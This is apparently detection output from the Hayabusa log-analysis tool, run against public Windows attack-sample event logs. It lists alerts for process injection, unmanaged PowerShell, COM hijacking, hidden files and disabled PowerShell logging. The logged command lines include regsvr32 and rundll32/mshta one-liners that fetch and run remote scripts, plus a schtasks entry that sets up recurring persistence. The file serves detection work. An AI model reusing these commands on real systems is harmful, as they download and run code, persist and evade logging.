2019-05-19 02:16:17.598 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.614 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.614 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.661 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.661 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.708 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.708 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.786 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\notepad.exe | Src PID: 2108 | Src PGUID: 365ABB72-3D37-5CE0-0000-001013DC0B00 | Tgt PID: 2840 | Tgt PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,Exec,Accessing WinAPI in PowerShell. Code Injection.,,../hayabusa-rules/sigma/create_remote_thread/sysmon_powershell_code_injection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:17.786 +09:00,IEWIN7,8,high,PrivEsc | Evas,Suspicious Remote Thread Created,,../hayabusa-rules/sigma/create_remote_thread/sysmon_suspicious_remote_thread.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:18.833 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Defense Evasion - Unmanaged PowerShell Detected | Image: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Management.A#\4b93b6bd71723bed2fa9dd778436dd5e\System.Management.Automation.ni.dll | Process: C:\Windows\System32\notepad.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2840 | PGUID: 365ABB72-3D1B-5CE0-0000-0010C3840B00 | Hash: SHA1=7208841D5A6BF1CDF957662E9E26FAB03F1EBCCD,MD5=774F7D6F5005983BE1CCCBCC3F2EC910,SHA256=8BC2E5C5413574C9AFC02BFBAA38E0ACD522DB1924B37FD0AE66061F46CC2838,IMPHASH=00000000000000000000000000000000",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:16:18.833 +09:00,IEWIN7,7,medium,Exec,In-memory PowerShell,,../hayabusa-rules/sigma/image_load/sysmon_in_memory_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_unmanagedpowershell_psinject_sysmon_7_8_10.evtx
2019-05-19 02:50:36.858 +09:00,IEWIN7,1,high,,Process Created_Sysmon Alert,"Execution - jscript9 engine invoked via clsid | Cmd: winpm.exe //e:{16d51579-a30b-4c8b-a276-0ff4dc41e755} winpm_update.js | Process: C:\ProgramData\winpm.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13531 | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: SHA1=C537FF2520215555B6E7B1B71C237F73D960BBED,MD5=41B81EF73218EC0EA0EC74F1C4C0F7B1,SHA256=D1B611E6D672AFC5A3D0F443FD8E2618B7416EFE2DD36593E971BF2F027A9AE3,IMPHASH=BFA8DFA346E250F59C0E2F57DAEFD14D",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:50:36.889 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Execution - rare script engine detected | Image: C:\Windows\System32\jscript9.dll | Process: C:\ProgramData\winpm.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 1884 | PGUID: 365ABB72-45EC-5CE0-0000-00103A3E2400 | Hash: SHA1=459A1C58B1B478B53734D0E053E8E14A12ACF427,MD5=FD5FFB00810EC3A9BE8D07EBE94CC034,SHA256=EEB182D598CE511C6509A0B94C17B04D9A4F451FCF99381E61B9DA9F224C510A,IMPHASH=E40AA27717F3033220E53410215609D0",../hayabusa-rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:51:14.254 +09:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x13531 | PID: 2600 | PGUID: 365ABB72-4612-5CE0-0000-00103D1E2600,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-19 02:51:14.254 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_sysmon_1_7_jscript9_defense_evasion.evtx
2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,high,,Process Created_Sysmon Alert,"technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories | Cmd: attrib +h nbtscan.exe | Process: C:\Windows\System32\attrib.exe | User: insecurebank\Administrator | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x566cc | PID: 2728 | PGUID: DFAE8213-9310-5CE1-0000-0010EABA0A00 | Hash: SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
2019-05-20 02:32:00.482 +09:00,DC1.insecurebank.local,1,low,Evas,Hiding Files with Attrib.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_attrib_hiding_files.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_hiding_files_via_attrib_cmdlet.evtx
2019-05-20 03:05:07.719 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | SetValue: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging: DWORD (0x00000000) | Process: C:\Windows\system32\reg.exe | PID: 1348 | PGUID: 365ABB72-9AD3-5CE1-0000-0010F55C1800,../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx
2019-05-20 03:05:33.454 +09:00,IEWIN7,12,medium,,Registry Key Create/Delete_Sysmon Alert,Defense Evasion - PowerShell Audit Settings Changed | DeleteValue: HKLM\SOFTWARE\Wow6432Node\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging\EnableScriptBlockLogging | Process: C:\Windows\system32\reg.exe | PID: 860 | PGUID: 365ABB72-9AEB-5CE1-0000-0010F0B51800,../hayabusa-rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_PsScriptBlockLogging_disabled_sysmon12_13.evtx
2019-05-21 09:35:07.308 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | Process: C:\Users\IEUser\Downloads\com-hijack.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0xc796 | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.308 +09:00,IEWIN7,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.463 +09:00,IEWIN7,11,info,,File Created,Path: C:\ProgramData\demo.dll | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.463 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,../hayabusa-rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.474 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3944 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.474 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\Downloads\test.bat | Process: C:\Users\IEUser\Downloads\com-hijack.exe | PID: 1912 | PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.474 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Users\IEUser\Downloads\com-hijack.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 1912 | Src PGUID: 365ABB72-47BB-5CE3-0000-0010BFA83E00 | Tgt PID: 3176 | Tgt PGUID: 365ABB72-47BB-5CE3-0000-00108CAD3E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.474 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c test.bat | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3944 | PGUID: 365ABB72-47BB-5CE3-0000-001071AD3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.474 +09:00,IEWIN7,1,info,,Process Created,"Cmd: C:\Windows\system32\cmd.exe /c pause | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Users\IEUser\Downloads\com-hijack.exe"" | LID: 0xc796 | PID: 3176 | PGUID: 365ABB72-47BB-5CE3-0000-00108CAD3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.518 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\cmd.exe /c test.bat | LID: 0xc796 | PID: 3168 | PGUID: 365ABB72-47BB-5CE3-0000-001053AF3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:07.870 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.0.153744822\2027949517"" -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 956 gpu | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3936 | PGUID: 365ABB72-47BB-5CE3-0000-001019C53E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:08.279 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2596 | PGUID: 365ABB72-47BC-5CE3-0000-00107DDD3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:08.728 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3860 | PGUID: 365ABB72-47BC-5CE3-0000-001044EE3E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:08.728 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.6.1176946839\1268428683"" -childID 1 -isForBrowser -prefsHandle 1844 -prefMapHandle 1836 -prefsLen 1 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 1680 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 2236 | PGUID: 365ABB72-47BC-5CE3-0000-0010C6F03E00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:10.161 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.13.1464597065\1561502721"" -childID 2 -isForBrowser -prefsHandle 2432 -prefMapHandle 2436 -prefsLen 5401 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 2448 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3920 | PGUID: 365ABB72-47BE-5CE3-0000-0010CF0C3F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-21 09:35:12.705 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" -contentproc --channel=""3168.20.1502540827\1989220046"" -childID 3 -isForBrowser -prefsHandle 3032 -prefMapHandle 3056 -prefsLen 6207 -prefMapSize 183351 -parentBuildID 20190507012018 -greomni ""C:\Program Files\Mozilla Firefox\omni.ja"" -appomni ""C:\Program Files\Mozilla Firefox\browser\omni.ja"" -appdir ""C:\Program Files\Mozilla Firefox\browser"" - 3168 ""\\.\pipe\gecko-crash-server-pipe.3168"" 3024 tab | Process: C:\Program Files\Mozilla Firefox\firefox.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Program Files\Mozilla Firefox\firefox.exe"" | LID: 0xc796 | PID: 3372 | PGUID: 365ABB72-47C0-5CE3-0000-00108D243F00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persist_firefox_comhijack_sysmon_11_13_7_1.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,info,,Process Created,"Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: ""cmd.exe"" /s /k pushd ""C:\Users\IEUser\Desktop"" | LID: 0xc796 | PID: 1532 | PGUID: 365ABB72-1A29-5CE4-0000-001054E32101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | Process: C:\Windows\System32\rundll32.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /C rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2920 | PGUID: 365ABB72-1A29-5CE4-0000-00107BE42101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.286 +09:00,IEWIN7,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.867 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new%20ActiveXObject(""WScript.Shell"").run(""mshta https://hotelesms.com/talsk.txt"",0,true); | LID: 0xc796 | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:57.867 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:59.389 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49703 (IEWIN7..home) | Dst: 108.179.232.58:443 (gator4243.hostgator.com) | User: IEWIN7\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 2432 | PGUID: 365ABB72-1A29-5CE4-0000-001079F92101,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:59.769 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\schtasks.exe"" /Create /sc MINUTE /MO 60 /TN MSOFFICE_ /TR ""mshta.exe https://hotelesms.com/Injection.txt"" /F | Process: C:\Windows\System32\schtasks.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\mshta.exe"" https://hotelesms.com/talsk.txt | LID: 0xc796 | PID: 3772 | PGUID: 365ABB72-1A2B-5CE4-0000-00102F502201",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:59.769 +09:00,IEWIN7,1,high,Exec | Evas,Windows Shell Spawning Suspicious Program,,../hayabusa-rules/sigma/process_creation/proc_creation_win_shell_spawn_susp_program.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:59.769 +09:00,IEWIN7,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
2019-05-22 00:32:59.809 +09:00,IEWIN7,11,info,,File Created,Path: C:\Windows\System32\Tasks\MSOFFICE_ | Process: C:\Windows\system32\svchost.exe | PID: 856 | PGUID: 365ABB72-39CB-5CE3-0000-0010E0AC0000,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/exec_persist_rundll32_mshta_scheduledtask_sysmon_1_3_11.evtx
